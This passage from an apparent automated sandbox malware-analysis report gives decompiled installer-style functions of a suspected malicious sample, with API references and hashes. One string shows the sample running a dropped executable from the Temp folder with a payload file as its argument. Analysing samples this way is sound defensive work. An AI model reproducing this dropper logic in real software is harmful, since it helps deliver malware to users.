                      • GlobalUnlock.KERNEL32(00000000), ref: 00405B7B
                      • SetClipboardData.USER32 ref: 00405B86
                      • CloseClipboard.USER32 ref: 00405B8C
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                      • String ID: H7B${
                      • API String ID: 590372296-2256286769
                      • Opcode ID: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                      • Instruction ID: d0bbb34d81c2c7a38b5cdb5171fa906e4f4201ee6cbe22cb0b3272b57562556b
                      • Opcode Fuzzy Hash: e4f6a996a8720e03325efe7e3e6ec8b5bf9409ee1120525c1c8a69bac62d7f01
                      • Instruction Fuzzy Hash: D8B137B0900608FFDF119FA0DD89AAE7B79FB08354F00417AFA45A61A0CB755E52DF68
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 78%
                      			E00404AB5(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                      				signed int _v8;
                      				signed int _v12;
                      				long _v16;
                      				long _v20;
                      				long _v24;
                      				char _v28;
                      				intOrPtr _v32;
                      				long _v36;
                      				char _v40;
                      				unsigned int _v44;
                      				signed int _v48;
                      				WCHAR* _v56;
                      				intOrPtr _v60;
                      				intOrPtr _v64;
                      				intOrPtr _v68;
                      				WCHAR* _v72;
                      				void _v76;
                      				struct HWND__* _v80;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				intOrPtr _t82;
                      				long _t87;
                      				short* _t89;
                      				void* _t95;
                      				signed int _t96;
                      				int _t109;
                      				signed short _t114;
                      				signed int _t118;
                      				struct HWND__** _t122;
                      				intOrPtr* _t138;
                      				WCHAR* _t146;
                      				unsigned int _t150;
                      				signed int _t152;
                      				unsigned int _t156;
                      				signed int _t158;
                      				signed int* _t159;
                      				signed int* _t160;
                      				struct HWND__* _t166;
                      				struct HWND__* _t167;
                      				int _t169;
                      				unsigned int _t197;
                      
                      				_t156 = __edx;
                      				_t82 =  *0x422720;
                      				_v32 = _t82;
                      				_t146 = ( *(_t82 + 0x3c) << 0xb) + 0x42b000;
                      				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                      				if(_a8 == 0x40b) {
                      					E00405CAC(0x3fb, _t146);
                      					E004068EF(_t146);
                      				}
                      				_t167 = _a4;
                      				if(_a8 != 0x110) {
                      					L8:
                      					if(_a8 != 0x111) {
                      						L20:
                      						if(_a8 == 0x40f) {
                      							L22:
                      							_v8 = _v8 & 0x00000000;
                      							_v12 = _v12 & 0x00000000;
                      							E00405CAC(0x3fb, _t146);
                      							if(E0040603F(_t186, _t146) == 0) {
                      								_v8 = 1;
                      							}
                      							E00406668(0x421718, _t146);
                      							_t87 = E00406A35(1);
                      							_v16 = _t87;
                      							if(_t87 == 0) {
                      								L30:
                      								E00406668(0x421718, _t146);
                      								_t89 = E00405FE2(0x421718);
                      								_t158 = 0;
                      								if(_t89 != 0) {
                      									 *_t89 = 0;
                      								}
                      								if(GetDiskFreeSpaceW(0x421718,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                      									goto L35;
                      								} else {
                      									_t169 = 0x400;
                      									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                      									asm("cdq");
                      									_v48 = _t109;
                      									_v44 = _t156;
                      									_v12 = 1;
                      									goto L36;
                      								}
                      							} else {
                      								_t159 = 0;
                      								if(0 == 0x421718) {
                      									goto L30;
                      								} else {
                      									goto L26;
                      								}
                      								while(1) {
                      									L26:
                      									_t114 = _v16(0x421718,  &_v48,  &_v28,  &_v40);
                      									if(_t114 != 0) {
                      										break;
                      									}
                      									if(_t159 != 0) {
                      										 *_t159 =  *_t159 & _t114;
                      									}
                      									_t160 = E00405F83(0x421718);
                      									 *_t160 =  *_t160 & 0x00000000;
                      									_t159 = _t160;
                      									 *_t159 = 0x5c;
                      									if(_t159 != 0x421718) {
                      										continue;
                      									} else {
                      										goto L30;
                      									}
                      								}
                      								_t150 = _v44;
                      								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                      								_v44 = _t150 >> 0xa;
                      								_v12 = 1;
                      								_t158 = 0;
                      								__eflags = 0;
                      								L35:
                      								_t169 = 0x400;
                      								L36:
                      								_t95 = E00404F52(5);
                      								if(_v12 != _t158) {
                      									_t197 = _v44;
                      									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                      										_v8 = 2;
                      									}
                      								}
                      								if( *((intOrPtr*)( *0x42923c + 0x10)) != _t158) {
                      									E00404F3A(0x3ff, 0xfffffffb, _t95);
                      									if(_v12 == _t158) {
                      										SetDlgItemTextW(_a4, _t169, 0x421708);
                      									} else {
                      										E00404E71(_t169, 0xfffffffc, _v48, _v44);
                      									}
                      								}
                      								_t96 = _v8;
                      								 *0x42a304 = _t96;
                      								if(_t96 == _t158) {
                      									_v8 = E0040140B(7);
                      								}
                      								if(( *(_v32 + 0x14) & _t169) != 0) {
                      									_v8 = _t158;
                      								}
                      								E004045E6(0 | _v8 == _t158);
                      								if(_v8 == _t158 &&  *0x423738 == _t158) {
                      									E00404A0E();
                      								}
                      								 *0x423738 = _t158;
                      								goto L53;
                      							}
                      						}
                      						_t186 = _a8 - 0x405;
                      						if(_a8 != 0x405) {
                      							goto L53;
                      						}
                      						goto L22;
                      					}
                      					_t118 = _a12 & 0x0000ffff;
                      					if(_t118 != 0x3fb) {
                      						L12:
                      						if(_t118 == 0x3e9) {
                      							_t152 = 7;
                      							memset( &_v76, 0, _t152 << 2);
                      							_v80 = _t167;
                      							_v72 = 0x423748;
                      							_v60 = E00404E0B;
                      							_v56 = _t146;
                      							_v68 = E004066A5(_t146, 0x423748, _t167, 0x421f20, _v12);
                      							_t122 =  &_v80;
                      							_v64 = 0x41;
                      							__imp__SHBrowseForFolderW(_t122);
                      							if(_t122 == 0) {
                      								_a8 = 0x40f;
                      							} else {
                      								__imp__CoTaskMemFree(_t122);
                      								E00405F37(_t146);
                      								_t125 =  *((intOrPtr*)( *0x42a270 + 0x11c));
                      								if( *((intOrPtr*)( *0x42a270 + 0x11c)) != 0 && _t146 == L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp") {
                      									E004066A5(_t146, 0x423748, _t167, 0, _t125);
                      									if(lstrcmpiW(0x428200, 0x423748) != 0) {
                      										lstrcatW(_t146, 0x428200);
                      									}
                      								}
                      								 *0x423738 =  *0x423738 + 1;
                      								SetDlgItemTextW(_t167, 0x3fb, _t146);
                      							}
                      						}
                      						goto L20;
                      					}
                      					if(_a12 >> 0x10 != 0x300) {
                      						goto L53;
                      					}
                      					_a8 = 0x40f;
                      					goto L12;
                      				} else {
                      					_t166 = GetDlgItem(_t167, 0x3fb);
                      					if(E00405FAE(_t146) != 0 && E00405FE2(_t146) == 0) {
                      						E00405F37(_t146);
                      					}
                      					 *0x429238 = _t167;
                      					SetWindowTextW(_t166, _t146);
                      					_push( *((intOrPtr*)(_a16 + 0x34)));
                      					_push(1);
                      					E004045C4(_t167);
                      					_push( *((intOrPtr*)(_a16 + 0x30)));
                      					_push(0x14);
                      					E004045C4(_t167);
                      					E004045F9(_t166);
                      					_t138 = E00406A35(8);
                      					if(_t138 == 0) {
                      						L53:
                      						return E0040462B(_a8, _a12, _a16);
                      					} else {
                      						 *_t138(_t166, 1);
                      						goto L8;
                      					}
                      				}
                      			}













































                      0x00404ab5
                      0x00404abb
                      0x00404ac1
                      0x00404ace
                      0x00404adc
                      0x00404adf
                      0x00404ae7
                      0x00404aed
                      0x00404aed
                      0x00404af9
                      0x00404afc
                      0x00404b6a
                      0x00404b71
                      0x00404c48
                      0x00404c4f
                      0x00404c5e
                      0x00404c5e
                      0x00404c62
                      0x00404c6c
                      0x00404c79
                      0x00404c7b
                      0x00404c7b
                      0x00404c89
                      0x00404c90
                      0x00404c97
                      0x00404c9a
                      0x00404cd6
                      0x00404cd8
                      0x00404cde
                      0x00404ce3
                      0x00404ce7
                      0x00404ce9
                      0x00404ce9
                      0x00404d05
                      0x00000000
                      0x00404d07
                      0x00404d0a
                      0x00404d18
                      0x00404d1e
                      0x00404d1f
                      0x00404d22
                      0x00404d25
                      0x00000000
                      0x00404d25
                      0x00404c9c
                      0x00404c9e
                      0x00404ca2
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404ca4
                      0x00404ca4
                      0x00404cb1
                      0x00404cb6
                      0x00000000
                      0x00000000
                      0x00404cba
                      0x00404cbc
                      0x00404cbc
                      0x00404cc5
                      0x00404cc7
                      0x00404ccc
                      0x00404ccf
                      0x00404cd4
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404cd4
                      0x00404d31
                      0x00404d3b
                      0x00404d3e
                      0x00404d41
                      0x00404d48
                      0x00404d48
                      0x00404d4a
                      0x00404d4a
                      0x00404d4f
                      0x00404d51
                      0x00404d59
                      0x00404d60
                      0x00404d62
                      0x00404d6d
                      0x00404d6d
                      0x00404d62
                      0x00404d7d
                      0x00404d87
                      0x00404d8f
                      0x00404daa
                      0x00404d91
                      0x00404d9a
                      0x00404d9a
                      0x00404d8f
                      0x00404daf
                      0x00404db4
                      0x00404db9
                      0x00404dc2
                      0x00404dc2
                      0x00404dcb
                      0x00404dcd
                      0x00404dcd
                      0x00404dd9
                      0x00404de1
                      0x00404deb
                      0x00404deb
                      0x00404df0
                      0x00000000
                      0x00404df0
                      0x00404c9a
                      0x00404c51
                      0x00404c58
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00404c58
                      0x00404b77
                      0x00404b80
                      0x00404b9a
                      0x00404b9f
                      0x00404ba9
                      0x00404bb0
                      0x00404bbc
                      0x00404bbf
                      0x00404bc2
                      0x00404bc9
                      0x00404bd1
                      0x00404bd4
                      0x00404bd8
                      0x00404bdf
                      0x00404be7
                      0x00404c41
                      0x00404be9
                      0x00404bea
                      0x00404bf1
                      0x00404bfb
                      0x00404c03
                      0x00404c10
                      0x00404c24
                      0x00404c28
                      0x00404c28
                      0x00404c24
                      0x00404c2d
                      0x00404c3a
                      0x00404c3a
                      0x00404be7
                      0x00000000
                      0x00404b9f
                      0x00404b8d
                      0x00000000
                      0x00000000
                      0x00404b93
                      0x00000000
                      0x00404afe
                      0x00404b0b
                      0x00404b14
                      0x00404b21
                      0x00404b21
                      0x00404b28
                      0x00404b2e
                      0x00404b37
                      0x00404b3a
                      0x00404b3d
                      0x00404b45
                      0x00404b48
                      0x00404b4b
                      0x00404b51
                      0x00404b58
                      0x00404b5f
                      0x00404df6
                      0x00404e08
                      0x00404b65
                      0x00404b68
                      0x00000000
                      0x00404b68
                      0x00404b5f

                      APIs
                      • GetDlgItem.USER32 ref: 00404B04
                      • SetWindowTextW.USER32(00000000,?), ref: 00404B2E
                      • SHBrowseForFolderW.SHELL32(?), ref: 00404BDF
                      • CoTaskMemFree.OLE32(00000000), ref: 00404BEA
                      • lstrcmpiW.KERNEL32("C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt,00423748,00000000,?,?), ref: 00404C1C
                      • lstrcatW.KERNEL32(?,"C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt), ref: 00404C28
                      • SetDlgItemTextW.USER32 ref: 00404C3A
                        • Part of subcall function 00405CAC: GetDlgItemTextW.USER32(?,?,00000400,00404C71), ref: 00405CBF
                        • Part of subcall function 004068EF: CharNextW.USER32(?,*?|<>/":,00000000,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406952
                        • Part of subcall function 004068EF: CharNextW.USER32(?,?,?,00000000,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406961
                        • Part of subcall function 004068EF: CharNextW.USER32(?,00000000,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406966
                        • Part of subcall function 004068EF: CharPrevW.USER32(?,?,772EFAA0,C:\Users\user~1\AppData\Local\Temp\,?,0040361B,C:\Users\user~1\AppData\Local\Temp\,C:\Users\user~1\AppData\Local\Temp\,00403923), ref: 00406979
                      • GetDiskFreeSpaceW.KERNEL32(00421718,?,?,0000040F,?,00421718,00421718,?,00000001,00421718,?,?,000003FB,?), ref: 00404CFD
                      • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404D18
                        • Part of subcall function 00404E71: lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404F12
                        • Part of subcall function 00404E71: wsprintfW.USER32 ref: 00404F1B
                        • Part of subcall function 00404E71: SetDlgItemTextW.USER32 ref: 00404F2E
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                      • String ID: "C:\Users\user~1\AppData\Local\Temp\rnixgfly.exe" C:\Users\user~1\AppData\Local\Temp\somvwkehjlp.rt$A$C:\Users\user~1\AppData\Local\Temp$H7B
                      • API String ID: 2624150263-86429991
                      • Opcode ID: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                      • Instruction ID: 9155a42c54a3203d4d9709c494e168d8d926bd307d67cbb08bf4d9f42020e7e3
                      • Opcode Fuzzy Hash: cafbbb3b6b33e648c9f94ba13bd1897e858c1dbc17bb594ac49896ccdcf60781
                      • Instruction Fuzzy Hash: 94A171F1900219ABDB11EFA5CD41AAFB7B8EF84315F11843BF601B62D1D77C8A418B69
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 67%
                      			E004021AA() {
                      				signed int _t52;
                      				void* _t56;
                      				intOrPtr* _t60;
                      				intOrPtr _t61;
                      				intOrPtr* _t62;
                      				intOrPtr* _t64;
                      				intOrPtr* _t66;
                      				intOrPtr* _t68;
                      				intOrPtr* _t70;
                      				intOrPtr* _t72;
                      				intOrPtr* _t74;
                      				intOrPtr* _t76;
                      				intOrPtr* _t78;
                      				intOrPtr* _t80;
                      				void* _t83;
                      				intOrPtr* _t91;
                      				signed int _t101;
                      				signed int _t105;
                      				void* _t107;
                      
                      				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
                      				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
                      				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
                      				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
                      				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
                      				_t52 =  *(_t107 - 0x20);
                      				 *(_t107 - 0x50) = _t52 & 0x00000fff;
                      				_t101 = _t52 & 0x00008000;
                      				_t105 = _t52 >> 0x0000000c & 0x00000007;
                      				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
                      				if(E00405FAE( *((intOrPtr*)(_t107 - 0x44))) == 0) {
                      					E00402DA6(0x21);
                      				}
                      				_t56 = _t107 + 8;
                      				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
                      				if(_t56 < _t83) {
                      					L14:
                      					 *((intOrPtr*)(_t107 - 4)) = 1;
                      					_push(0xfffffff0);
                      				} else {
                      					_t60 =  *((intOrPtr*)(_t107 + 8));
                      					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
                      					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
                      					if(_t61 >= _t83) {
                      						_t64 =  *((intOrPtr*)(_t107 + 8));
                      						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
                      						if(_t101 == _t83) {
                      							_t80 =  *((intOrPtr*)(_t107 + 8));
                      							 *((intOrPtr*)( *_t80 + 0x24))(_t80, L"C:\\Users\\FRONTD~1\\AppData\\Local\\Temp");
                      						}
                      						if(_t105 != _t83) {
                      							_t78 =  *((intOrPtr*)(_t107 + 8));
                      							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
                      						}
                      						_t66 =  *((intOrPtr*)(_t107 + 8));
                      						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
                      						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
                      						if( *_t91 != _t83) {
                      							_t76 =  *((intOrPtr*)(_t107 + 8));
                      							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
                      						}
                      						_t68 =  *((intOrPtr*)(_t107 + 8));
                      						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
                      						_t70 =  *((intOrPtr*)(_t107 + 8));
                      						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
                      						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                      							_t74 =  *((intOrPtr*)(_t107 - 0x38));
                      							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
                      						}
                      						_t72 =  *((intOrPtr*)(_t107 - 0x38));
                      						 *((intOrPtr*)( *_t72 + 8))(_t72);
                      					}
                      					_t62 =  *((intOrPtr*)(_t107 + 8));
                      					 *((intOrPtr*)( *_t62 + 8))(_t62);
                      					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
                      						_push(0xfffffff4);
                      					} else {
                      						goto L14;
                      					}
                      				}
                      				E00401423();
                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t107 - 4));
                      				return 0;
                      			}






















                      0x004021b3
                      0x004021bd
                      0x004021c7
                      0x004021d1
                      0x004021dc
                      0x004021df
                      0x004021f9
                      0x004021fc
                      0x00402202
                      0x00402205
                      0x0040220f
                      0x00402213
                      0x00402213
                      0x00402218
                      0x00402229
                      0x00402231
                      0x004022e8
                      0x004022e8
                      0x004022ef
                      0x00402237
                      0x00402237
                      0x00402246
                      0x0040224a
                      0x0040224d
                      0x00402253
                      0x00402261
                      0x00402264
                      0x00402266
                      0x00402271
                      0x00402271
                      0x00402276
                      0x00402278
                      0x0040227f
                      0x0040227f
                      0x00402282
                      0x0040228b
                      0x0040228e
                      0x00402294
                      0x00402296
                      0x004022a0
                      0x004022a0
                      0x004022a3
                      0x004022ac
                      0x004022af
                      0x004022b8
                      0x004022be
                      0x004022c0
                      0x004022ce
                      0x004022ce
                      0x004022d1
                      0x004022d7
                      0x004022d7
                      0x004022da
                      0x004022e0
                      0x004022e6
                      0x004022fb
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004022e6
                      0x004022f1
                      0x00402c2d
                      0x00402c39

                      APIs
                      • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                      Strings
                      • C:\Users\user~1\AppData\Local\Temp, xrefs: 00402269
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: CreateInstance
                      • String ID: C:\Users\user~1\AppData\Local\Temp
                      • API String ID: 542301482-3107243751
                      • Opcode ID: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                      • Instruction ID: f110e38d5ccd8909b9e85e2ea6b1342c5fae2602ce40754bea02e3b472428d32
                      • Opcode Fuzzy Hash: 077b7362f6a1d4038be91bf7f4b9e5842d68daf9de23732b557fb751e09ce78c
                      • Instruction Fuzzy Hash: BC411771A00209EFCF40DFE4C989E9D7BB5BF49304B20456AF505EB2D1DB799981CB94
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 39%
                      			E0040290B(short __ebx, short* __edi) {
                      				void* _t21;
                      
                      				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
                      					E004065AF( *((intOrPtr*)(_t21 - 0xc)), _t8);
                      					_push(_t21 - 0x2b0);
                      					_push(__edi);
                      					E00406668();
                      				} else {
                      					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
                      					 *__edi = __ebx;
                      					 *((intOrPtr*)(_t21 - 4)) = 1;
                      				}
                      				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t21 - 4));
                      				return 0;
                      			}




                      0x00402923
                      0x0040293e
                      0x00402949
                      0x0040294a
                      0x00402a94
                      0x00402925
                      0x00402928
                      0x0040292b
                      0x0040292e
                      0x0040292e
                      0x00402c2d
                      0x00402c39

                      APIs
                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                      Memory Dump Source
                      • Source File: 00000000.00000002.253377158.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.253370521.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253387347.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253394584.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                      • Associated: 00000000.00000002.253445143.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_fyTwP4SHWF.jbxd
                      Similarity
                      • API ID: FileFindFirst
                      • String ID:
                      • API String ID: 1974802433-0
                      • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                      • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                      • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                      • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 96%
                      			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                      				struct HWND__* _v8;
                      				struct HWND__* _v12;
                      				long _v16;
                      				signed int _v20;
                      				signed int _v24;
                      				intOrPtr _v28;
                      				signed char* _v32;
                      				int _v36;
                      				signed int _v44;
                      				int _v48;
                      				signed int* _v60;
                      				signed char* _v64;
                      				signed int _v68;
                      				long _v72;
                      				void* _v76;
                      				intOrPtr _v80;
                      				intOrPtr _v84;
                      				void* _v88;
                      				void* __ebx;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t198;
                      				intOrPtr _t201;
                      				long _t207;
                      				signed int _t211;
                      				signed int _t222;
                      				void* _t225;
                      				void* _t226;
                      				int _t232;
                      				long _t237;
                      				long _t238;
                      				signed int _t239;
                      				signed int _t245;
                      				signed int _t247;
                      				signed char _t248;
                      				signed char _t254;
                      				void* _t258;
                      				void* _t260;
                      				signed char* _t278;
                      				signed char _t279;
                      				long _t284;
                      				struct HWND__* _t291;
                      				signed int* _t292;
                      				int _t293;
                      				long _t294;
                      				signed int _t295;
                      				void* _t297;
                      				long _t298;
                      				int _t299;
                      				signed int _t300;
                      				signed int _t303;
                      				signed int _t311;
                      				signed char* _t319;
                      				int _t324;
                      				void* _t326;
                      
                      				_t291 = _a4;
                      				_v12 = GetDlgItem(_t291, 0x3f9);
                      				_v8 = GetDlgItem(_t291, 0x408);
                      				_t326 = SendMessageW;
                      				_v24 =  *0x42a288;
                      				_v28 =  *0x42a270 + 0x94;
                      				if(_a8 != 0x110) {
                      					L23:
                      					if(_a8 != 0x405) {
                      						_t301 = _a16;
                      					} else {
                      						_a12 = 0;
                      						_t301 = 1;
                      						_a8 = 0x40f;
                      						_a16 = 1;
                      					}
                      					if(_a8 == 0x4e || _a8 == 0x413) {
                      						_v16 = _t301;
                      						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
                      							if(( *0x42a279 & 0x00000002) != 0) {
                      								L41:
                      								if(_v16 != 0) {
                      									_t237 = _v16;
                      									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
                      										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
                      									}
                      									_t238 = _v16;
                      									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
                      										_t301 = _v24;
                      										_t239 =  *(_t238 + 0x5c);
                      										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
                      											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
                      										} else {
                      											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
                      										}
                      									}
                      								}
                      								goto L48;
                      							}
                      							if(_a8 == 0x413) {
                      								L33:
                      								_t301 = 0 | _a8 != 0x00000413;
                      								_t245 = E00404F7F(_v8, _a8 != 0x413);
                      								_t295 = _t245;
                      								if(_t295 >= 0) {
                      									_t94 = _v24 + 8; // 0x8
                      									_t301 = _t245 * 0x818 + _t94;
                      									_t247 =  *_t301;
                      									if((_t247 & 0x00000010) == 0) {
                      										if((_t247 & 0x00000040) == 0) {
                      											_t248 = _t247 ^ 0x00000001;
                      										} else {
                      											_t254 = _t247 ^ 0x00000080;
                      											if(_t254 >= 0) {
                      												_t248 = _t254 & 0x000000fe;
                      											} else {
                      												_t248 = _t254 | 0x00000001;
                      											}
                      										}
                      										 *_t301 = _t248;
                      										E0040117D(_t295);
                      										_a12 = _t295 + 1;
                      										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
                      										_a8 = 0x40f;
                      									}
                      								}
                      								goto L41;
                      							}
                      							_t301 = _a16;
                      							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
                      								goto L41;
                      							}
                      							goto L33;
